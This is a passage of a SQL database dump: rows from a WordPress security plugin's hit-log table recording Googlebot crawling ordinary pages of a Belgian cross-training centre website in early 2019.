(78480, 1550600049.947312, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78481, 1550603061.687132, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78482, 1550609101.950130, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78483, 1550965057.176040, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78484, 1550965057.755772, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78485, 1550972273.270740, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78486, 1550972869.324937, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78487, 1550974077.555609, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78488, 1550986156.347067, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78489, 1551005324.746813, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78490, 1551025814.937641, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78491, 1551035483.430705, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78492, 1551043359.474165, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78493, 1551045151.172934, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78494, 1551062629.884405, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78495, 1551062630.358423, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78496, 1551070112.704423, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78497, 1551165032.664424, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78498, 1551165033.325743, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78499, 1551166839.487697, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78500, 1551174654.694517, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78501, 1551182499.119414, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78502, 1551202965.262684, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78503, 1551212230.640056, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78504, 1551242399.724968, 1123631748, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/xaururxuhszpmjt.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78505, 1551247244.273307, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78506, 1551424940.052709, 1123632613, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78507, 1551528602.825504, 1123631773, 0, 0, 1, 0, 1, 'https://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78508, 1551528603.415781, 1123631773, 0, 1, 1, 0, 1, 'https://www2.crosstrainingcenter.be/.well-known/assetlinks.json', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78509, 1551531014.993967, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78510, 1551531015.524687, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78511, 1551534675.690170, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78512, 1551545502.824815, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78513, 1551566634.889480, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78514, 1551569664.784291, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78515, 1551570277.628212, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78516, 1551573260.229258, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78517, 1551575648.375678, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78518, 1551579262.970759, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78519, 1551605219.600687, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78520, 1551608251.264869, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78521, 1551608845.583824, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78522, 1551611279.274843, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78523, 1551612467.979048, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78524, 1551614285.443322, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78525, 1551643705.271102, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(78526, 1552096469.155570, 1123631553, 0, 0, 1, 0, 1, 'https://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78527, 1552096469.746546, 1123631553, 0, 1, 1, 0, 1, 'https://www2.crosstrainingcenter.be/.well-known/assetlinks.json', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78528, 1552118225.500741, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78529, 1552118226.071347, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78530, 1552130870.638076, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78531, 1552139657.214240, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78532, 1552140780.908320, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78533, 1552149178.619366, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78534, 1552150373.737304, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78535, 1552153404.783425, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78536, 1552161852.682046, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78537, 1552172044.777027, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78538, 1552173833.249782, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78539, 1552185284.579127, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78540, 1552190724.589864, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78541, 1552198574.432406, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78542, 1552199192.311361, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78543, 1552230915.996309, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78544, 1552354527.366252, 1123632613, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78545, 1552694975.555405, 1123631291, 0, 0, 1, 0, 1, 'https://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78546, 1552694976.073911, 1123631291, 0, 1, 1, 0, 1, 'https://www2.crosstrainingcenter.be/.well-known/assetlinks.json', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78547, 1552742290.044495, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78548, 1552742290.561242, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78549, 1552745918.459957, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78550, 1552747731.504587, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78551, 1552749527.231308, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78552, 1552753130.168462, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78553, 1552757954.349876, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78554, 1552772983.286172, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78555, 1552776598.472313, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78556, 1552785248.891382, 1123631748, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78557, 1553262229.631040, 1123631553, 0, 0, 1, 0, 1, 'https://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78558, 1553279834.273569, 1123632613, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78559, 1553279834.718098, 1123632613, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78560, 1553307117.509296, 1123632613, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78561, 1553310159.131970, 1123632613, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78562, 1553322303.875112, 1123632613, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78563, 1553323430.283615, 1123632613, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78564, 1553324005.912161, 1123632613, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78565, 1553329410.085807, 1123632613, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78566, 1553339067.502244, 1123632613, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78567, 1553421982.785903, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
